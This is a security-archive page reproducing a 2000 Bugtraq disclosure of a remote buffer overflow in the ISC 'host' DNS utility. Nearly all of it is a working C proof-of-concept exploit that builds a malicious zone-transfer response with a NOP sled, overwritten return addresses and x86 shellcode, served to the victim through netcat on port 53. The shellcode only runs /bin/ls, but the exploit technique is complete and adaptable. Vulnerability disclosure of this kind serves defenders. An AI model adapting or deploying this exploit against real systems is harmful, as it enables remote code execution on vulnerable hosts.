ISC host Remote Buffer Overflow Vulnerability

excerpted from the original bugtraq posting by antirez <antirez@linuxcare.com> on Fri, 27 Oct 2000.

command line:

./host -l -v -t any somezone.org <fake server>

proof of concepts exploit:

/* hostexp.c
* cc hostexp.c -o hostexp
*
* usage: ./hostexp | nc -l -p 53
*/

#include <stdio.h>
#include <netinet/in.h>

int main(void)
{
int offset = 140;
unsigned int base = 0xbffff74c+offset, i;
char shellcode[] = /* 48 bytes, ripped */
"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
"\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
"\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
"\xff\xff/bin/ls";
unsigned short a = htons(1024);
char buffer[1026];

memcpy(buffer, &a, 2);
memset(buffer+2, 'A', 100); /* avoid response processing */
memset(buffer+102, 0x90, 100);
memcpy(buffer+202, shellcode, 48);
for (i = 202+48; i < 202+48+600; i+=4)
memcpy(buffer+i, &base, 4);
write(fileno(stdout), buffer, 1026);
return 0;
}


 

Privacy Statement
Copyright 2010, SecurityFocus